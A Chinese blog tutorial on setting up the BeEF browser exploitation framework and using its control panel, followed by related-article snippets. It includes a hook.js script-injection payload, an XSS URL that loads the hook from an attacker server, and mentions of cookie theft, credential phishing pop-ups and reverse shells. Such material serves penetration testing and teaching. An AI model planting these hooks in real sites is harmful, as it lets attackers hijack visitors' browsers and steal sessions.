BEEF的搭建与使用

最新推荐文章于 2025-08-26 14:15:35 发布
原创 最新推荐文章于 2025-08-26 14:15:35 发布 · 1.6w 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

安装与搭建

beef是ruby写的,在windows下安装beef还是有些麻烦的,需要装很多东西。
源码在github googlecode等地方均有下载
http://code.google.com/p/beef/downloads/list
https://github.com/beefproject/beef
在windows下配置ruby,推荐大家使用railsinstaller这个东西,各种环境一键安装,提醒一下这里ruby要求1.9以及以上版本。
http://railsinstaller.org/
另外还需要SQLite.dll这个下载之后放到ruby的bin目录下
http://www.sqlite.org/download.html
之后只要跑到源代码目录下,运行
bundle install
ruby beef
出现这种东西说明成功了,端口以及各种配置在config.yaml中配置
C:\beef\beef-master>ruby beef
[16:06:09][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[16:06:09][*] Browser Exploitation Framework (BeEF) 0.4.4.7-alpha
[16:06:09]    |   Twit: @beefproject
[16:06:09]    |   Site: http://beefproject.com
[16:06:09]    |   Blog: http://blog.beefproject.com
[16:06:09]    |_  Wiki: https://github.com/beefproject/beef/wiki
[16:06:09][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[16:06:11][*] BeEF is loading. Wait a few seconds...
[16:06:20][*] 10 extensions enabled.
[16:06:20][*] 180 modules enabled.
[16:06:20][*] 2 network interfaces were detected.
[16:06:20][+] running on network interface: 192.168.0.102
[16:06:20]    |   Hook URL: http://192.168.0.102:3000/hook.js
[16:06:20]    |_  UI URL:   http://192.168.0.102:3000/ui/panel
[16:06:20][+] running on network interface: 127.0.0.1
[16:06:20]    |   Hook URL: http://127.0.0.1:3000/hook.js
[16:06:20]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[16:06:20][*] RESTful API key: 33c15454ae8fb24723c90311e064035b48f841d2
[16:06:20][*] HTTP Proxy: http://127.0.0.1:6789
[16:06:20][*] BeEF server started (press control+c to stop)

安装完成后,访问以下URL就可以看到登陆界面了,默认用户名密码beef beef
http://localhost:3000/ui/panel

基本功能与使用

官方提供了一个简单的例子
http://127.0.0.1:3000/demos/basic.html
里面这一句,导入了网站根目录下的hook.js,
<head>
	<title>BeEF Basic Demo</title>
	<script>
		var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
		document.write(commandModuleStr);
	</script>
</head>
访问这个URL之后发现自己上线了。

Details

里面会给出上线主机的一些详细信息,其中包含cookie,支持插件,浏览器类型,系统版本等。
 Display information about the hooked browser after you've run some command modules.

Logs 

记载了上线主机的动作,仅限于lost focus   regained focus    online   offline这种。
Displays recent log entries related to this particular hooked browser.

Command

里面模块很多,很厉害的样子,其中模块是否可以使用参照这里
Each command module has a traffic light icon, which is used to indicate the following:
  •  The command module works against the target and should be invisible to the user
  •  The command module works against the target, but may be visible to the user
  •  The command module is yet to be verified against this target
  •  The command module does not work against this target

 XSSRays

不知道是做什么的,貌似鸡肋。
XssRays allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS. To customize default settings of an XssRays scan, please use the XssRays tab.

Rider

可以使用被HOOK的BOWSER伪造请求。
The Rider tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.


【渗透测试工具beef】XSS渗透测试工具beef如何安装使用
03-02 595
目录 事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 模块颜色及解释 回顾
Beef-xss安装及使用
qq_40624810的博客
12-10 8281
一、背景 BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。 BeEF
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
牛肉安装机 该脚本可自动从GitHub安装BeEF(浏览器利用框架)。 要使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef-installer.py 准备好了! 如果是disro,则牛肉目录将位于环境变量$ HOME中,位于termux中的$ PREFIX / opt中 Kali Linux(PC,Userland) Kali Nethunter无根 Termux 预览: Termux
beef安装
2403_82795493的博客
04-29 623
长度被限制了,做一个简单的xss绕过,检测源码,把maxlength改为100就行。把短链接发送给靶机访问(靶机访问就会受到xss攻击)利用生成的链接插入到,存在xss漏洞的地方。打开皮卡丘靶场,将payload插入到里面。第一次会提示让你输入新密码,用于一会登录。攻击机IP:192.168.0.105。本机IP:192.168.0.5。在登录beef,查看信息。把生成的新链接复制下来。启动beef-xss。
如何使用 BeEF 黑客工具(非常详细),零基础入门到精通,看这一篇就够了
最新发布
m0_71745484的博客
08-26 1188
本文介绍了浏览器利用框架BeEF的基本概念、安装方法和使用场景。BeEF是一款专注于客户端浏览器漏洞利用的工具,通过注入hook.js脚本建立通信通道,可获取浏览器环境信息并发起攻击。文章详细演示了BeEF的安装过程(基于Kali系统)、Web界面功能,以及通过钓鱼链接挂接浏览器的两种方法。最后展示了三个具体攻击案例:Google钓鱼、伪造通知栏获取反向shell和窃取会话cookie。该工具为安全测试人员提供了模拟真实攻击场景的能力,帮助评估Web客户端安全风险。
beef工具-01】神器beef的安装简介
m0_64378913的博客
06-01 8329
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
初探BeEF
weixin_30258901的博客
01-23 363
1.什么是BeEF? 就是The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。 里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。 大概长这个样子(默认用户名密码是beefbeef): 2.安装beef使用beef BT5...
linux安装BEEF
weixin_72453966的博客
03-26 221
BeEF(The Browser Exploitation Framework)是一款强大的浏览器渗透测试框架,主要用于对浏览器进行安全评估和攻击。通过控制受害者的浏览器,渗透测试人员可以执行多种攻击技术,如窃取信息、执行恶意代码等。BeEF 的目标是揭示现代浏览器的安全风险,并为安全研究人员提供一个强大的测试平台。跨平台支持:兼容多种操作系统,如 Windows、Linux、macOS。多种攻击模块:提供多种预定义的攻击模块,方便快速测试。实时控制:通过实时控制面板监控和操作受害者的浏览器。
利用BeEF执行XSS攻击
m0_70185580的博客
05-31 854
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中,并启动BeEF的hook服务。接下来,需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时,BeEF就会启动并开始执行攻击。
云服务器上搭建beef-xss
03-11
8. 测试和使用使用Web浏览器访问云服务器的IP地址和端口号,进入beef-xss的管理界面,开始进行漏洞测试和XSS攻击。 请注意,在进行任何安全测试和攻击活动之前,确保你已经获得了合法的授权,并且遵守法律和道德...
BEFF安装配置
Kali与编程
12-19 1719
BeEF是一款功能强大的浏览器利用框架,对于渗透测试人员和安全研究人员来说,是一种有用的工具,可以帮助他们评估和加固浏览器的安全性。重要的是,在使用BeEF进行渗透测试时,要遵守法律和道德规范,并且只在合法授权的情况下使用该工具。选择适合自己的方式安装Kali Linux,配置好网络设置,并熟悉和掌握常用的渗透测试工具,这样就能够在Kali Linux环境中进行有效的渗透测试和安全审计工作。请记住,BeEF是一种强大的工具,应在合法的道德框架内使用,并遵循适用的法律和规定。
docker-beef:BeEF(浏览器开发框架)构建的 Dockerfile
06-20
码头牛肉 BeEF 的 Dockerfile(浏览器开发框架) 拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务
本地搭建beef_xss映射到公网
qq_41671415的博客
02-20 1726
前言:原本很简单的docker安装beef就完事l,结果垃圾阿里yum源居然不能构建缓存,网上的在线xss风险高的一批不敢用, 环境: 服务端:阿里云(centos8),frps 客户端:win 10 , frpc frp安装配置so easy,百度一大堆 docker安装beef so easy,百度一大堆 访问成功: 在这里插入图片描述 ...
kali上安装beef
weixin_45873667的博客
04-27 598
前言: BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具 安装BeEF步骤 打开kali sudo apt-get install beef-xss 输入beef-xss启动beef,输入用户名和密码,(默认都是admin) 接着输入beef-xss启动 ...
Beef的安装及基本使用
weixin_50341025的博客
04-15 2818
安装beef apt-get update apt-get install beef-xss 配置密码 /etc/beef-xss/config.yaml 默认用户名beef 修改用户名或者密码,注意用户名不需要符号括起来,密码则需要双引号括起来 启动服务 beef-xss 启动后会看见一些生成好的连接 [] Web UI: http://127.0.0.1:3000/ui/panel 管理页面 [] Hook: 样例地址 登录beef控制平台 将代码插入到目标URL,并欺骗被攻击
BeEF】Ubuntu 20.04安装BeEF
白帽子续命指南
06-05 2382
先把老外的这个教程贴在这里,按着这个基本就可以操作了,如果对自己的技术不放心的,一定要看完,我后面会写我操作时遇到的问题! Installing BeEF on ubuntu 18.04 While working on a VM for a class, I had the opportunity to install BeEF for the students. This was the first VM I have built using Ubuntu 18.04, so I expected th
XSS框架之安装BEEF
3569
07-18 2765
这次部署邮件服务器大致分为3个步骤 » 安装GEM » 安装配置BEEF » 测试 » 安装GEM 步骤 1 » 安装rvm。 wget -O 123 https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer chmod +x 123 ./123 安装环境需
beef安装具体过程
qq_35398399的博客
10-27 1908
新版kali的BeEF的安装使用root权限安装beef-xss安装apt --fix-broken install![在这里插入图片描述](https://img-blog.csdnimg.cn/20201027105521422.png#pic_center)安装beef-xss运行beef-xss登录beef网站进行具体操作 使用root权限 安装了一个月,一直没有办法安装上kali,终于有一天不知道是哪位锦鲤保佑,突然我就安装上了。再次分享给大家我的经验。 1.利用sudo su进入root权限 安
在kali环境下安装Beef-Xss靶场搭建
weixin_51525416的博客
09-02 2294
在kali环境下安装Beef-Xss靶场搭建
beef-xss详细使用教程
03-18
### BeEF XSS Framework 使用指南 #### 什么是BeEFBeEF(Browser Exploitation Framework)是一个用于浏览器渗透测试的工具框架。它允许安全研究人员分析和演示浏览器作为攻击媒介的风险。通过注入恶意JavaScript代码,BeEF可以控制受害者的浏览器会话,并执行多种攻击向量。 #### 安装BeEF 要安装BeEF,可以通过以下命令完成: ```bash git clone https://github.com/beefproject/beef.git cd beef bundle install ``` 运行BeEF服务时,使用如下命令: ```bash ruby beef.rb ``` 默认情况下,BeEF会在`http://localhost:3000/ui/panel`上启动管理界面,默认用户名和密码均为`beef`[^4]。 #### 配置BeEF Hook Script 为了利用BeEF的功能,需要将目标用户的浏览器连接到BeEF服务器。这通常通过在存在XSS漏洞的目标网站中嵌入`hook.js`脚本来实现。例如,在反射型或存储型XSS场景下,可以插入以下HTML代码片段: ```html <script src="http://<your_beef_server_ip>:3000/hook.js"></script> ``` 这里的`<your_beef_server_ip>`应替换为实际部署BeEF的IP地址。 #### 测试环境搭建 假设已经有一个本地PHP文件`xss.php`,其中包含简单的反射型XSS漏洞。以下是可能的内容示例: ```php <?php echo $_GET['input']; ?> ``` 访问URL `http://127.0.0.1/engineer/xss.php?input=<script%20src="http://<your_beef_server_ip>:3000/hook.js"></script>` 将触发BeEF钩子脚本加载[^3]。 #### 利用BeEF进行渗透测试 一旦受害者浏览了含有上述脚本的页面,他们的浏览器会被标记为“在线”,并显示在BeEF控制面板中的模块列表里。此时可以选择不同的攻击模块来评估潜在风险,比如收集系统信息、窃取Cookie或者模拟键盘输入等操作。 #### 跨网络使用BeEF (BeeF-Over-Wan) 对于希望在外网环境下开展测试的情况,推荐采用类似Ngrok这样的反向代理解决方案。具体做法涉及设置隧道并将外部流量导向内部BeEF实例。有关更详细的指导,请参阅专门文档[BeeF-Over-Wan](https://github.com/snoopysecurity/beef-over-wan)[^5]。 ---
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值